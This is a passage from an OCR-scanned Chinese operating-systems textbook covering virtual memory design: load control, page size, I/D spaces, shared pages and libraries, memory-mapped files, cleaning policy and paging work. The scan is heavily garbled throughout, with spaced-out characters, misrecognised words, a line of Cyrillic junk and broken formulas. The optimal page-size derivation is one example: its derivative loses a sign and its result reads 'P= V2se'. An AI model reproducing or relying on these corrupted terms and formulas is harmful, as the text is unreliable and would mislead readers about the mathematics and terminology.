某 些 情况 下 ， 选 择 局 部 策略 还 是 全 局 策略 是 与 页 面 置 图 3-24 缺 页 中 断 率 是 分 配 的 页 框 数 的 函数 
换算 法 无 关 的 。 

另 一 方面 ， 对 于 其 他 的 页 面 置换 算法 ， 只 有 采用 局 部 策略 才 有 意义 。 特别 是 工作 集 和 WSClock 算 法 
是 针对 某 些 特定 进程 的 而 且 必 须 应 用 在 这 些 进程 的 上 下 文中 。 实际 上 没有 针对 整个 机 器 的 工作 集 ， 并 且 
试图 使 用 所 有 工作 集 的 并 集 作为 机 器 的 工作 集 可 能 会 丢失 一 些 局 部 特性 ， 这 样 算法 就 不 能 得 到 好 的 性 能 。 


3.5.2 负载 控制 
即使 是 使 用 最 优 页 面 置换 算法 并 对 进程 采用 理想 的 全 局 页 框 分 配 ， 系统 也 可 能 会 发 生 颠 徐 。 事 实 上 ， 
一 旦 所 有 进程 的 组 合 工作 集 超 出 了 内 存 容量 ,就 可 能 发 生 丰 繁 。 该 现象 的 症状 之 - -就 是 如 PFF 算 法 所 指出 的 ， 
一 些 进程 需要 更 多 的 内 存 ， 但 是 没有 进程 需要 更 少 的 内 存 。 在 这 种 情况 下 ， 没有 方法 能 够 在 不 影响 其 他 进 
程 的 情况 下 满足 那些 需要 更 多 内 存 的 进程 的 需要 。 惟一 现实 的 解决 方案 就 是 暂时 从 内 存 中 去 掉 一 些 进程 。 
减少 竞争 内 存 的 进程 数 的 一 个 好 方法 是 将 一 部 分 进程 交换 到 磁盘 ， 并 释放 他 们 所 占有 的 所 有 页 面 。 
例如 ， 一 个 进程 可 以 被 交换 到 磁盘 ， 而 它 的 页 框 可 以 被 其 他 处 于 颠 簿 状 态 的 进程 分 享 。 如 果 颠 毓 停止， 系 
统 就 能 够 这 样 运行 一 段 时 间 。 如 果 自 繁 没 有 结束 ， 需 要 继续 将 其 他 进程 ОНА, ИЗИН Ж. РАЈЕ, 
即使 是 使 用 分 页 ， 交 换 也 是 需要 的 ， 只 是 现在 交换 是 用 来 减少 对 内 存 潜在 的 需求 ， 而 不 是 收回 它 的 页 面 。 
将 进程 交换 出 去 以 减轻 内 存 需求 的 压力 是 借用 了 两 级 调度 的 思想 ， 在 此 过 程 中 一 些 进程 被 放 到 磁盘 ， 此 
时 用 一 个 短期 的 调度 程序 来 调度 剩余 的 进程 。 很 明显 ， 这 两 种 思路 可 以 被 组 合 起 来 ， 将 恰好 足够 的 进程 交换 
出 去 以 获取 可 接受 的 缺 页 中 断 率 。 一 些 进程 被 周期 性 地 从 磁盘 调 入 ， 而 其 他 一 些 则 被 周期 性 地 交换 到 磁盘 。 
不 过 ， 另 一 个 需要 考虑 的 因素 是 多 道 程序 设计 的 道 数 。 当 内 存 中 的 进程 数 过 低 的 时 候 ，CPU 可 能 在 
很 长 的 时 间 内 处 于 空闲 状态 。 考 虑 到 该 因素 ， 在 决定 交换 出 哪个 进程 时 不 光 要 考虑 进程 大 小 和 分 页 率 ， 
还 要 考虑 它 的 特性 (如 它 究竟 是 CPU 密集 型 还 是 1O 窗 集 型 ) 以 及 其 他 进程 的 特性 。 


3.5.3 页 面 大 小 

页 面 大 小 是 操作 系统 可 以 选择 的 一 个 参数 。 例 如 ， 即使 硬件 设计 只 支持 512 字 节 的 页 面 ， 操 作 系统 
也 可 以 很 容易 通过 总 是 为 页 面 对 0 和 1、2 和 3、 4 和 5 等 分 配 两 个 连续 的 512 字 节 的 页 框 ， 而 将 其 作为 1KB 
的 页 面 。 

要 确定 最 佳 的 页 面 大 小 需要 在 几 个 互相 矛盾 的 因素 之 间 进行 权衡 。 从 结果 看 ， 不 存在 全 局 最 优 。 首 
先 ， 有 两 个 因素 可 以 作为 选择 小 页 面 的 理由 。 随 便 选 择 一 个 正文 段 、 数 据 段 或 堆栈 段 很 可 能 不 会 恰好 装 
满 整数 个 页 面 ， 平 均 的 情况 下 ， 最 后 一 个 页 面 中 有 -- 半 是 空 的 。 多 余 的 空间 就 被 浪费 掉 了 ， 这 种 浪费 称 
为 内 部 碎片 (internal fragmentation)。 在 内 存 中 有 n 个 段 、 页 面 大 小 为 p 字 节 时 ， 会 有 np/2 字 节 被 内 部 碎 
片 浪费 。 从 这 方面 考虑 ， 使 用 小 页 面 更 好 。 

选择 小 页 面 还 有 一 个 明显 的 好 处 ， 如 果 考 虑 一 个 程序 ， 它 分 成 8 个 阶段 顺序 执行 ， 每 阶段 需要 4KB 
内 存 。 如 果 页 面 大 小 是 32KB， 那 就 必须 始终 给 该 进程 分 配 32KB 内 存 。 如 果 页 面 大 小 是 16KB， 它 就 只 需 
要 16KB。 如 果 页 面 大 小 是 4KB 或 更 小 ， 在 任何 时 刻 它 只 需要 4KB 内 存 。 总 的 来 说 ， 与 小 页 面相 比 ， 大 页 
面 使 更 多 没有 用 的 程序 保留 在 内 存 中 。 

在 另 一 方面 ， 页 面 小 意味 着 程序 需要 更 多 的 页 面 ， 这 又 意味 着 需要 更 大 的 页 表 。 一 个 32KB 的 程序 
只 需要 4 个 8KB 的 页 面 ， 却 需要 64 个 512 字 节 的 页 面 。 内 存 与 磁盘 之 间 的 传输 一 般 是 一 次 一 页 ， 传 输 中 的 
大 部 分 时 间 都 花 在 了 寻 道 和 旋转 延迟 上 ， 所 以 传输 一 个 小 的 页 面 所 用 的 时 间 和 传输 一 个 大 的 页 面 基本 上 
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是 相同 的 。 装 入 64 个 512 字 节 的 页 面 可 能 需要 64 х 10ms， 而 装 入 4 个 8KB 的 页 面 可 能 只 需要 4 x 12ms。 

在 某 些 机 器 上 , 每 次 CPU 从 一 个 进程 切换 到 另 一 个 进程 时 都 必须 把 新 进程 的 页 表 装 入 硬件 寄存 器 中 。 
这 样 ， 页 面 越 小 意味 着 装 入 页 面 寄存 器 花费 的 时 间 就 会 越 长 ， 而 且 页 表 占 用 的 空间 也 会 随 着 页 面 的 减 小 
而 增 大 。 

最 后 一 点 可 以 从 数学 上 进行 分 析 ， 假 设 进程 平均 大 小 是 :个 字 节 ， 页 面 大 小 是 p 个 字 节 ， 每 个 页 表 项 
需要 e 个 字 节 。 那 么 每 个 进程 需要 的 页 数 大 约 是 s/p， 占 用 了 se/p 个 字 节 的 页 表 空间 。 内 部 碎片 在 最 后 一 
页 浪费 的 内 存 是 p/2。 因 此 ， 由 页 表 和 内 部 碎片 损失 造成 的 全 部 开销 是 以 下 两 项 之 和 : 

开销 =se /p +p/2 

在 页 面 比较 小 的 时 候 ， 第 一 项 (页 表 大 小 ) 大 。 在 页 面 比较 大 时 第 二 项 (内 部 碎片 ) 大。 最 优 值 一 
定 在 页 面 大 小 处 于 中 间 的 某 个 值 时 取得 ， 通 过 对 p 一 次 求 导 并 令 右 边 等 于 零 ， 我 们 得 到 方程: 

=se /p+1/2=0 

从 这 个 方程 可 以 得 出 最 优 页 面 大 小 的 公式 (只 考虑 碎片 浪费 和 页 表 所 需 的 内 存 ) ， 结 果 是 : 

P= V2se 

对 于 s = IMB 和 每 个 页 表 项 e = 8 个 字 节 ， 最 优 页 面 大 小 是 4KB。 商 用 计算 机 使 用 的 页 面 大 小 一 般 在 
512 字 节 到 64KB 之 间 ， 以 前 的 典型 值 是 IKB， 而 现在 更 常见 的 页 面 大 小 是 4 KB 或 8KB。 随 着 存储 器 越 来 
越 大 ， 页 面 也 倾向 于 更 大 (但 不 是 线性 的 )。 把 RAM 扩 大 4 倍 极 少 会 使 页 面 大 小 加 倍 。 

3.5.4 分 离 的 指令 空间 和 数据 空间 

大 多 数 计算 机 只 有 一 个 地 址 空间 ， 既 存放 程序 也 存放 数据 ， 如 图 3-25a 所 示 。 如 果 地 址 空间 足够 大 ， 

那么 一 切 都 好 。 然 而 ， 地 址 空间 通常 太 小 了 ， 这 就 使 得 程序 员 对 地 址 空间 的 使 用 出 现 困难 。 


] 空 间 D 空 间 


} 未 使 用 页 面 


|а 
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b) 
图 3-25 a) 单个 地 址 空间 ，b) 分 离 的 I 空间 和 D 空 间 


首先 在 PDP-11 (16 位 ) 上 实现 的 一 种 解决 方案 是 ， 为 指令 (程序 正文 ) 和 数据 设置 分 离 的 地 址 空 
间 ， 分 别称 为 [空间 和 DD 空间， 如 图 3-25b 所 示 。 每 个 地 址 空间 都 从 0 开始 到 某 个 最 大 值 ， 比 较 有 代表 性 的 
是 2 "1 或 者 2”-1。 链 接 器 必须 知道 何 时 使 用 分 离 的 ] 空 间 和 D 空 间 ， 因 为 当 使 用 它们 时 ， 数 据 被 重 定位 
到 虚拟 地 址 0， 而 不 是 在 程序 之 后 开始 。 

在 使 用 这 种 设计 的 计算 机 中 ， 两 种 地 址 空间 都 可 以 进行 分 页 ， 而 且 互相 独立 。 它 们 分 别 有 自 己 的 页 
表 ， 分 别 完成 虚拟 页 面 到 物理 页 框 的 映射 。 当 硬件 进行 取 指令 操作 时 ， 它 知道 要 使 用 I 空 间 和 1 空间 页 表 。 
类 似 地 ， 对 数据 的 访问 必须 通过 D 空 间 页 表 。 除 了 这 一 区 别 ， 拥 有 分 离 的 空间 和 D 空 间 不 会 引入 任 何 复 
杂 的 设计 ， 而 且 它 还 能 使 可 用 的 地 址 空间 加 倍 。 


3.5.5 共享 页 面 

另 一 个 设计 问题 是 共享 。 在 大 型 多 道 程序 设计 系统 中 ， 几 个 不 同 的 用 户 同时 运行 同一 个 程序 是 很 常 
见 的 。 显 然 ， 由 于 避免 了 在 内 存 中 有 一 个 页 面 的 两 份 副本 ， 共 享 页 面 效率 更 高 。 这 里 存在 一 个 问题 ， 即 
并 不 是 所 有 的 页 面 都 适合 共享 。 特 别 地 ， 那 些 只 读 的 页 面 (诸如 程序 文本 ) 可 以 共享 ， 但 是 数据 页 面 则 
不 能 共享 。 

如 果 系 统 支持 分 离 的 空间 和 D 空 间 ， 那 么 通过 让 两 个 或 者 多 个 进程 来 共享 程序 就 变 得 非常 简单 了 ， 
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这 些 进程 使 用 相同 的 ! 空 间 页 表 和 不 同 的 D 空 间 页 表 。 在 一 个 比较 典型 的 使 用 这 种 方式 来 支持 共享 的 实现 
中 ， 页 表 与 进程 表 数据 结构 无 关 。 每 个 进程 
在 它 的 进程 表 中 都 有 两 个 指针 ， 一 个 指向 1 空 
间 页 表 ， 一 个 指向 D 空 间 页 表 ， 如 图 3-26 所 示 。 
当 调度 程序 选择 一 个 进程 运行 时 ， 它 使 用 这 


些 指针 来 定位 合适 的 页 表 ， 并 使 用 它们 来 设 тра T 
立 MMU。 即 使 没有 分 离 的 空间 和 D 空 间 ， 进 二 
程 也 可 以 共享 程序 (或 者 有 时 为 库 ) ， 但 要 使 | 
用 更 为 复杂 的 机 制 。 

在 两 个 或 更 多 进程 共享 某 些 代码 时 ， 在 

页 面 上 存在 一 个 问题 。 假 设 进程 A 和 进程 
B 同 时 运行 一 个 编辑 器 并 共享 页 面 。 如 果 调 度 
程序 决定 从 内 存 中 移 走 A， 撤 销 其 所 有 的 页 面 数据 1 数据 2 
并 用 一 个 其 他 程序 来 填充 这 些 空 的 页 框 ， 则 一 = 
会 引起 B 产 生 大 量 的 缺 页 中 断 ， 才 能 把 这 些 页 ха 
HERA. 图 3-26 两 个 进程 通过 共享 程序 页 表 来 共享 同一 个 程序 


类 似 地 ， 当 进程 A 结束 时 ， 能 够 发 现 这 
些 页 面 仍然 在 被 使 用 是 非常 必要 的 ， 这 样 ， 这 些 页 面 的 磁盘 空间 才 不 会 被 随意 释放 。 查 找 所 有 的 页 表 ， 
考察 一 个 页 面 是 否 共享 ， 其 代价 通常 比较 大 ， 所 以 需要 专门 的 数据 结构 记录 共享 页 面 ， 特 别 地 ， 如 果 共 
享 的 单元 是 单个 页 面 (或 一 批 页 面 )， 而 不 是 整个 页 表 。 

共享 数据 要 比 共享 代码 麻烦 ， 但 也 不 是 不 可 能 。 特 别 是 在 UNIX 中 ， 在 进行 fork 系 统 调用 后 ， 父 进 
程 和 子 进程 要 共享 程序 文本 和 数据 。 在 分 页 系统 中 ， 通常 是 让 这 些 进程 分 别 拥有 它们 自己 的 页 表 ， 但 都 
指向 同一 个 页 面 集合 。 这 样 在 执行 fork 调 用 时 就 不 需要 进行 页 面 复制 。 然而 ， 所 有 映射 到 两 个 进程 的 数 
据 页 面 都 是 只 读 的 。 

只 要 这 两 个 进程 都 仅仅 是 读数 据 ， 而 不 做 更 改 ， 这 种 情况 就 可 以 保持 下 去 。 但 只 要 有 一 个 进程 更 新 
了 一 点 数据 ， 就 会 触发 只 读 保护 ， 并 引发 操作 系统 陷阱 。 然后 会 生成 一 个 该 页 的 副本 ， 这 样 每 个 进程 都 
有 自己 的 专用 副本 。 两 个 复制 都 是 可 以 读 写 的 ， 随后 对 任何 一 个 副本 的 写 操作 都 不 会 再 引发 陷阱 。 这 种 
策略 意味 着 那些 从 来 不 会 执行 写 操作 的 页 面 (包括 所 有 程序 页 面 ) 是 不 需要 复制 的 ， 只 有 实际 修改 的 数 
据 页 面 需要 复制 。 这 种 方法 称 为 写 时 复制 ， 它 通过 减少 复制 而 提高 了 性 能 。 
3.5.6 共享 库 

可 以 使 用 其 他 的 粒度 取代 单个 页 面 来 实现 共享 。 如 果 一 个 程序 被 启动 两 次 ， 大 多 数 操作 系统 会 自动 
共享 所 有 的 代码 页 面 ， 而 在 内 存 中 只 保留 一 份 代码 页 面 的 副本 。 代码 页 面 总 是 只 读 的 ， 因 此 这 样 做 不 存 
在 任何 问题 。 依 赖 于 不 同 的 操作 系统 ， 每 个 进程 都 拥有 一 份 数据 页 面 的 私有 副本 ， 或 者 这 些 数据 页 面 被 
共享 并 且 被 标记 为 只 读 。 如 果 任 何 一 个 进程 对 一 个 数据 页 面 进行 修改 ， 系统 就 会 为 此 进程 复制 这 个 数据 
页 面 的 一 个 副本 ， 并 且 这 个 副本 是 此 进程 私有 的 ， 也 就 是 说 会 执行 “ 写 时 复制 "。 

现代 操作 系统 中 ， 有 很 多 大 型 库 被 众多 进程 使 用 ， 例 如 ， 处 理 浏览 文件 以 便 打 开 文 件 的 对 话 框 的 库 和 
多 个 图 形 库 。 把 所 有 的 这 些 库 静 态 地 与 磁盘 上 的 每 一 个 可 执行 程序 绑 定 在 一 起 ， 将 会 使 它们 变 得 更 加 庞大 。 

一 个 更 加 通用 的 技术 是 使 用 共享 库 (在 Windows 中 称 作 DLL 或 动态 链接 库 )。 为 了 清楚 地 表达 共享 
库 的 思想 ， 首 先 考 虑 一 下 传统 的 链接 。 当 链接 一 个 程序 时 ， 要 在 链接 器 的 命令 中 指定 一 个 或 多 个 目标 文 
件 ， 可 能 还 包括 一 些 库 文 件 。 以 下 面 的 UNIX 命 令 为 例 ， 

ld *.о -lc -Im 
这 个 命令 会 链接 当前 目录 下 的 所 有 的 .o (目标 ) 文件 ， 并 扫描 两 个 库 : /usr/lib/libe.a 和 /usr/lib/libm.a。 任 
何在 目标 文件 中 被 调用 了 但 是 没有 被 定义 的 函数 СНЕ ап, Printf) ， 都 被 称 作 未 定义 外 部 函数 (undefined 
externals) 。 链 接 器 会 在 库 中 寻找 这 些 未 定义 外 部 函数 。 如 果 找到 了 ， 则 将 它们 加 载 到 可 执行 二 进 制 文件 
中 。 任何 被 这 些 未 定义 外 部 函数 调用 了 但 是 不 存在 的 函数 也 会 成 为 未 定义 外 部 函数 。 例如 ，printf 需 要 
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write， 如 果 write 还 没有 被 加 载 进 来 ， 链 接 器 就 会 查找 write 并 在 找到 后 把 它 加 载 进 来 。 当 链接 器 完成 任务 
后 ， 一 个 可 执行 二 进 制 文 件 被 写 到 磁盘 ， 其 中 包括 了 所 需 的 全 部 函数 。 在 库 中 定义 但 是 没有 被 调用 的 函 
数 则 不 会 被 加 载 进去 。 当 程序 被 装 入 内 存 执行 时 ， 它 需要 的 所 有 函数 都 已 经 准备 就 绪 了 。 

假设 普通 程序 需要 消耗 20~50MB 用 于 图 形 和 用 户 界面 函数 。 静 态 链接 上 百 个 包括 这 些 库 的 程序 会 
浪费 大 量 的 磁盘 空间 ， 在 装载 这 些 程序 时 也 会 浪费 大 量 的 内 存 空间 ， 因 为 系统 不 知道 它 可 以 共享 这 些 库 。 
这 就 是 引入 共享 库 的 原因 。 当 一 个 程序 和 共享 库 (与 静态 库 有 些许 区 别 ) 链接 时 ， 链 接 器 没有 加 载 被 调 
用 的 函数 ， 而 是 加 载 了 一 小 段 能 够 在 运行 时 绑 定 被 调用 函数 的 存根 例 程 (stub routine)。 依 赖 于 系统 和 
配置 信息 ， 共 享 库 或 者 和 程序 一 起 被 装载 ， 或 者 在 其 所 包含 函数 第 一 次 被 调用 时 被 装载 。 当 然 ， 如 果 其 
他 程序 已 经 装载 了 某 个 共享 库 ， 就 没有 必要 再 次 装载 它 了 一 一 这 正 是 关键 所 在 。 值 得 注意 的 是 ， 当 一 个 
共享 库 被 装载 和 使 用 时 ， 整 个 库 并 不 是 被 一 次 性 地 读 和 内存。 而 是 根据 需要 ， 以 页 面 为 单位 装载 的 ， 因 
此 没有 被 调用 到 的 函数 是 不 会 被 装载 到 内 存 中 的 。 

除了 可 以 使 可 执行 文件 更 小 、 节 省 内 存 空间 之 外 ， 共 享 库 还 有 一 个 优点 : 如 果 共 享 库 中 的 一 个 函数 
因为 修正 一 个 bug 被 更 新 了 ， 那 么 并 不 需要 重新 编译 调用 了 这 个 函数 的 程序 。 旧 的 二 进 制 文件 依然 可 以 
正常 工作 。 这 个 特性 对 于 商业 软件 来 说 尤为 重要 ， 因 为 商业 软件 的 源码 不 会 分 发 给 客户 。 例 如 ， 如 果 微 
软 发 现 并 修复 了 某 个 标准 DLL 中 的 安全 错误 ，Windows 更 新 会 下 载 新 的 DLL 来 替换 原 有 文件 ， 所 有 使 用 
这 个 DLL 的 程序 在 下 次 启动 时 会 自动 使 用 这 个 新 版 本 的 DLL。 

不 过 ， 共 享 库 带 来 了 一 个 必须 解决 的 小 问题 ， 如 图 3-27 所 示 。 我 们 看 到 有 两 个 进程 共享 一 个 20KB 
大 小 的 库 (假设 每 一 方 框 为 4KB)。 但 是 ， 这 个 库 被 不 同 的 进程 定位 在 不 同 的 地 址 上 ， 大 概 是 因为 程序 
本 身 的 大 小 不 相同 。 在 进程 1 中 ， 库 从 地 址 36K 开 始 ， 在 进程 2 中 则 从 地 址 12K 开 始 。 假 设 库 中 第 一 个 函 
数 要 做 的 第 一 件 事 就 是 跳 转 到 库 的 地 址 16。 如 果 这 个 库 没有 被 共享 ， 它 可 以 在 装载 的 过 程 中 重 定位 ， 就 
会 跳 转 (在 进程 1 中 ) 到 虚拟 地 址 的 36K+16。 注 意 ， 库 被 装载 到 的 物理 地 址 与 这 个 库 是 否 为 共享 库 是 没 
有 任何 关系 的 ， 因 为 所 有 的 页 面 都 被 MMU 硬 件 从 虚拟 地 址 映射 到 了 物理 地 址 。 


12K 


进程 2 
图 3-27 两 个 进程 使 用 的 共享 库 


但 是 ， 由 于 库 是 共享 的 ， 因 此 在 装载 时 再 进行 重 定位 就 行 不 通 了 。 毕 竞 ， 当 进程 2 调用 第 一 个 函数 
时 (在 地 址 12K) ， 跳 转 指令 需要 跳 转 到 地 址 12K+16， 而 不 是 地 址 36K+16。 这 就 是 那个 必须 解决 的 小 问 
题 。 解 决 它 的 一 个 办 法 是 写 时 复制 ， 并 为 每 一 个 共享 这 个 库 的 进程 创建 新 页 面 ， 在 创建 新 页 面 的 过 程 中 
进行 重 定位 。 当 然 ， 这 样 做 和 使 用 共享 库 的 目的 相悖 。 

一 个 更 好 的 解决 方法 是 ， 在 编译 共享 库 时 ， 用 一 个 特殊 的 编译 选项 告知 编译 器 ， 不 要 产生 使 用 绝对 
地 址 的 指令 。 相 反 ， 只 能 产生 使 用 相对 地 址 的 指令 。 例 如 ， 几 乎 总 是 使 用 向 前 (或 向 后 ) 跳 转 n 个 字 节 
(与 给 出 其 体 跳 转 地 址 的 指令 不 同 ) 的 指令 。 不 论 共享 库 被 放置 在 虚拟 地 址 空间 的 什么 位 置 ， 这 种 指令 
都 可 以 正确 工作 。 通 过 避免 使 用 绝对 地 址 ， 这 个 问题 就 可 以 被 解决 。 只 使 用 相对 偏 移 量 的 代码 被 称 作 位 
置 无 关 代码 (position-independent code) 。 
3.57 内 存 映 射 文件 

共享 库 实 际 上 是 一 种 更 为 通用 的 机 制 一 一 内 存 映射 文件 (memory-mapped file) 的 一 个 特例 。 这 种 
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机 制 的 思想 是 : 进程 可 以 通过 发 起 一 个 系统 调用 ， 将 -个 文件 映射 到 其 虚拟 地 址 空间 的 一 部 分 。 在 多 数 
实现 中 ， 在 映射 共享 的 页 面 时 不 会 实际 读 人 页 面 的 内 容 ， 而 是 在 访问 页 面 时 才 会 被 每 次 一 页 地 读 和 信 ， 磁 
盘 文 件 则 被 当 作 后 备 存储 。 当 进程 退出 或 显 式 地 解除 文件 映射 时 ， 所 有 被 改动 的 页 面 会 被 写 回 到 文件 中 

内 存 映射 文件 提供 了 一 种 MO 的 可 选 模型 。 可 以 把 一 个 文件 当 作 -个 内 存 中 的 大 字符 数组 来 访问 ， 
而 不 用 通过 读 写 操作 来 访问 这 个 文件 。 在 一 些 情况 下 ， 程序 员 发 现 这 个 模型 更 加 便利 。 

如 果 两 个 或 两 个 以 上 的 进程 同时 映射 了 同一 个 文件 ， 它们 就 可 以 通过 共享 内 存 来 通信 。 一 个 进程 在 
共享 内 存 上 完成 了 写 操作 ， 此 刻 当 另 一 个 进程 在 映射 到 这 个 文件 的 虚拟 地 址 空间 上 执行 读 操作 时 ， 它 就 
可 以 立刻 看 到 上 一 个 进程 写 操作 的 结果 。 因 此 ， 这 个 机 制 提供 了 一 个 进程 之 间 的 高 带宽 通道 ， 而 且 这 种 
应 用 很 普遍 (甚至 扩展 到 用 来 映射 无 名 的 临时 文件 )。 很 显然 ， 如 果 内 存 映射 文件 可 用 ， 共 享 库 就 可 以 
使 用 这 个 机 制 。 


3.5.8 清除 策略 

如 果 发 生 缺 页 中 断 时 系统 中 有 大 量 的 空闲 页 框 ， 此 时 分 页 系统 工作 在 最 佳 状态 。 如 果 每 个 页 框 都 被 
占用 ， 而 且 被 修改 过 的 话 ， 再 换 人 一 个 新 页 面 时 ， 旧 页 面 应 首先 被 写 回 磁盘 。 为 保证 有 足够 的 空 闪 页 框 ， 
很 多 分 页 系统 有 一 个 称 为 分 页 守护 进程 (paging daemon) 的 后 台 进程 ， 它 在 大 多 数 时 候 睡 眠 ， 但 定期 
被 唤醒 以 检查 内 存 的 状态 。 如 果 空 闲 页 框 过 少 ， 分 页 守护 进程 通过 预定 的 页 面 置 换算 法 选择 页 面 换 出 内 
存 。 如 果 这 些 页 面 装 入 内 存 后 被 修改 过 ， 则 将 它们 写 回 磁盘 。 

在 任何 情况 下 ， 页 面 中 原先 的 内 容 都 被 记录 下 来 。 当 需 要 使 用 一 个 已 被 淘汰 的 页 面 时， 如 果 该 页 杠 
还 没有 被 覆盖 ， 将 其 从 空闲 页 框 缓冲 地 中 移出 即 可 恢复 该 页 面 。 保存 一 定数 目的 页 框 供给 比 使 用 所 有 内 
存 并 在 需要 时 搜索 一 个 页 框 有 更 好 的 性 能 。 分 页 守护 进程 至 少 保证 了 所 有 的 空闲 页 框 是 “干净 ”的 ， 所 
以 空闲 页 框 在 被 分 配 时 不 必 再 急 着 写 同 磁盘 。 

-种 实现 清除 策略 的 方法 就 是 使 用 一 个 双 指针 时 钟 。 前 指针 由 分 页 守护 进程 控制 。 当 它 指向 一 个 脏 
页 面 时 ， 就 把 该 页 面 写 回 磁盘 ， 前 指针 向 前 移动 。 当 它 指向 一 个 王 净 页 面 时 ， 仅 仅 指针 向 前 移动 。 后 指 
针 用 于 页 面 置换 ， 就 像 在 标准 时 钟 算法 中 一 样 。 现 在 ， 由 于 分 页 守护 进程 的 工作 ， 后 指针 命中 干净 页 面 
的 概率 会 增加 。 


3.5.9 虚拟 内 存 接口 

到 现在 为 止 ， 所 有 的 讨论 都 假定 虚拟 内 存 对 进程 和 程序 员 来 说 是 透明 的 ， 也 就 是 说 ， 它 们 都 可 以 在 
一 台 只 有 较 少 物 理 内 存 的 计算 机 上 看 到 很 大 的 虚拟 地 址 空间 。 对 于 不 少 系统 而 言 这 样 做 是 对 的 ， 但 对 于 
一 些 高 级 系统 而 言 ， 程 序 员 可 以 对 内 存 映射 进行 控制 ， 并 可 以 通过 非常 规 的 方法 来 增强 程序 的 行为 。 这 
一 节 我 们 将 简短 地 讨论 一 下 这 些 问题 。 

公 许 程序 员 对 内 存 映射 进行 控制 的 一 个 原因 就 是 为 了 允许 两 个 或 者 多 个 进程 共享 同一 部 分 内 存 。 如 
果 程 序 员 可 以 对 内 存 区 域 进行 命名 ， 那么 就 有 可 能 实现 共享 内 存 。 通过 让 一 个 进程 把 一 片 内 存 区 域 的 名 
称 通知 另 一 个 进程 ， 而 使 得 第 二 个 进程 可 以 把 这 片区 域 映射 到 它 的 虚拟 地 址 空间 中 去 。 通过 两 个 进程 
(或 者 更 多 ) 共享 同一 部 分 页 面 ， 高 带宽 的 共享 就 成 为 可 能 一 一 -个 进程 往 共享 内 存 中 写 内 容 而 另 一 个 
从 中 读 出 内 容 。 

页 面 共享 也 可 以 用 来 实现 高 性 能 的 消息 传递 系统 。 一 般 地 ， 传 递 消息 的 时 候 ， 数 据 被 从 一 个 地 址 空 
间 复 制 到 另 一 个 地 址 空间 ， 开 销 很 大 。 如 果 进 程 可 以 控制 它们 的 页 面 映射 ， 就 可 以 这 样 来 发 送 一 条 消息 : 
发 送 进程 清除 那些 包含 消息 的 页 面 的 映射 ， 而 接收 进程 把 它们 映射 进来 。 这 里 只 需要 复制 页 面 的 名 字 ， 
而 不 需要 复制 所 有 数据 。 

另外 一 种 高 级 存储 管理 技术 是 分 布 式 共享 内 存 (Feeley A, 1995; Li, 1986, Li 和 Hudak, 
1989, Zekauskas 等 人 ，1994) 。 该 方法 允许 网 络 上 的 多 个 进程 共享 一 个 页 面 集合 ， 这 些 页 面 可 能 (而 不 
是 必要 的 ) 作为 单个 的 线性 共享 地 址 空间 。 当 一 个 进程 访问 当前 还 没有 映射 进来 的 页 面 时 ， 就 会 产生 缺 
页 中 断 。 在 内 核 空间 或 者 用 户 空间 中 的 缺 页 中 断 处 理 程序 就 会 对 拥有 该 页 面 的 机 器 进行 定位 ， 并 向 它 发 
送 一 条 消息 ， 请 求 它 清除 该 页 面 的 映射 ， 并 通过 网 络 发 送出 来 。 当 页 面 到 达 时 ， 就 把 它 映射 进来 ， 并 重 
新 开始 运行 引起 缺 页 中 断 的 指令 。 在 第 8 章 中 我 们 将 详细 讨论 分 布 式 共享 内 存 。 
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3.6 有 关 实 现 的 问题 

实现 虚拟 内 存 系统 要 在 主要 的 理论 算法 (如 第 一 次 机 会 算法 与 老化 算法 ， 局 部 页 面 分 配 与 全 局 页 面 
分 配 ， 请 求 调 页 与 质 先 调 页 ) 之 间 进 行 选 择 。 但 同时 也 要 注意 一 系列 实际 现 问题 。 在 这 一 节 中 将 涉 
及 一 些 通常 情况 下 会 遇 到 的 问题 以 及 一 些 解决 方案 。 

3.6.1 与 分 页 有 关 的 工作 

操作 系统 要 在 下 面 的 四 段 时 间 里 做 与 分 页 相关 的 工作 : 进程 创建 时 ， 进 程 执 行 时 ， 缺 页 中 断 时 和 进 
程 终止 时 。 下 面 将 分 别 对 这 由 个 时 期 进行 简短 的 分 析 。 

当 在 分 页 系统 中 创建 一 个 新 进程 时 ， 操 作 系 统 要 确定 程序 和 数据 在 初始 时 有 多 大 ， 并 为 它们 创建 一 
个 页 表 。 操 作 系统 还 要 在 内 存 中 为 页 表 分 配 空间 并 对 其 进行 初始 化 。 当 进程 被 换 出 时 ， 页 表 不 需要 驻 留 在 
内 存 中 ， 但 当 进 程 运行 时 ， 它 必须 在 内 存 中 。 另 外 ， 操 作 系统 要 在 磁盘 交换 区 中 分 配 空间 ， 以 便 在 一 个 进 
程 换 出 时 在 磁盘 上 有 放置 此 进程 的 空间 。 操 作 系 统 还 要 用 程序 正文 和 数据 对 交换 区 进行 初始 化 ， 这 样 当 新 
进程 发 生 缺 页 中 断 时 ， 可 以 调 人 需要 的 页 面 。 某 些 系统 直接 从 磁盘 上 的 可 执行 文件 对 程序 正文 进行 分 页 ， 
以 节省 磁盘 空间 和 初始 化 时 间 。 最 后 ， 操 作 系统 必须 把 有 关 页 表 和 磁盘 交换 区 的 信息 存储 在 进程 表 中 。 

当 调 度 一 个 进程 执行 时 ， 必 须 为 新 进程 重 置 MMU， 剧 新 TLB， 以 清除 以 前 的 进程 遗留 的 痕迹 。 新 
进程 的 页 表 必 须 成 为 当前 页 表 ， 通 常 可 以 通过 复制 该 页 表 或 者 把 一 个 指向 它 的 指针 放 进 某 个 硬件 寄存 器 
来 完成 。 有 时 ， 在 进程 初始 化 时 可 以 把 进程 的 部 分 或 者 全 部 页 面 装 入 内存 中 以 减少 缺 页 中 断 的 发 生 ， 例 
án, PC (程序 计数 器 ) 所 指 的 页 面 肯定 是 需要 的 。 

当 缺 页 中 断 发 生 时 ， 操 作 系 统 必须 通过 读 硬 件 寄存 器 来 确定 是 哪个 虚拟 地 址 造成 了 缺 页 中 断 。 通 过 
该 信息 ， 它 要 计算 需要 哪个 页 面 ， 并 在 磁盘 上 对 该 页 面 进行 定位 。 它 必须 找到 合适 的 页 框 来 存放 新 页 面 ， 
必要 时 还 要 置换 老 的 页 面 ， 然 后 把 所 需 的 页 面 读 入 页 框 。 最 后 ， 还 要 备份 程序 计数 器 ， 使 程序 计数 器 指 
向 引起 缺 页 中 断 的 指令 ， 并 重新 执行 

当 进程 退出 的 时 候 ， 操 作 系 统 必须 释放 进程 的 页 表 、 页 面 和 页 面 在 硬盘 上 所 占用 的 空间 。 如 果 某 些 
